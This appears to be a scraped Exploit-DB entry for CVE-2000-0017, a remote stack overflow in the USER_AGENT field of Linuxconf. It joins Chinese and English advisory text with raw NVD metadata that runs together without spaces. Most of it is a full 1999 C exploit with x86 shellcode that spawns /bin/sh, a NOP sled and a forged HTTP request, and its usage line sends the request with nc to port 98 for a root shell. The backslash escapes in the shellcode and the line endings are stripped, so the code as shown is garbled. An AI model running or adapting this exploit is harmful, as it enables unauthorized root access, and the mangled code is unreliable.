https://www.exploit-db.com/exploits/20619
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199912-064

Linuxlinuxconf包中存在缓冲区溢出漏洞，远程攻击者利用该漏洞通过一个长的参数获得根特权。

source: http://www.securityfocus.com/bid/2352/info

Linuxconf is a Linux configuration utility from Solucorp.

An attacker supplying excess data to the USER_AGENT field in vulnerable versions of Linuxconf. This data can overflow the relevant buffer, creating a stack overflow and, properly exploited, allowing remote execution of arbitrary code as root.

/*

  linuxconf exploit by R00T-X (c) 1999

  USER_AGENT overflow x86
  should work on all linux's but you need to have
  network access to linuxconf

  greetz to: j0e, AcidCrunCh, |420|, umm and everyone who knows me, heh :P

  have fun with this but for EDUCATIONAL PURPOSES :)

  Usage:   (./linexp <offset>;cat)| nc targethost 98

 */

char shell[] =
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90xebx3bx5ex89x76x08x31xedx31xc9x31xc0x88"
"x6ex07x89x6ex0cxb0x0bx89xf3x8dx6ex08x89xe9x8dx6e"
"x0cx89xeaxcdx80x31xdbx89xd8x40xcdx80x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"xe8xc0xffxffxff/bin/shx00";

#include <stdio.h>
#include <stdlib.h>
#include <limits.h>
#include <string.h>

#define BUFLEN 1025
#define NOP 0x90

void
main (int argc, char *argv[])
{
  char buf[BUFLEN];
  int offset,nop,i;
  unsigned long esp;
  char shell[1024+300];

  if(argc < 2)
  {
  fprintf(stderr,"usage: (%s <offset>;cat)|nc host.com 98n", argv[0]);
  exit(0);
  }

  nop = 511;
  esp = 0xefbfd5e8;
  offset = atoi(argv[1]);

  memset(buf, NOP, BUFLEN);
  memcpy(buf+(long)nop, shell, strlen(shell));

  for (i = 256; i < BUFLEN - 3; i += 2)
{    *((int *) &buf[i]) = esp + (long) offset;
     shell[ sizeof(shell)-1 ] = 0;
}

 printf("POST / HTTP/1.0rnContent-Length: %d, User-agent: rn", BUFLEN);
  for (i = 0; i < BUFLEN; i++)
    putchar(buf[i]);

  printf("rn");

  return;
}

VulnerablesoftwareandversionsConfiguration1OR*cpe:/o:redhat:linux*DenotesVulnerableSoftware*ChangesrelatedtovulnerabilityconfigurationsTechnicalDetailsVulnerabilityType(ViewAll)CVEStandardVulnerabilityEntry:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0017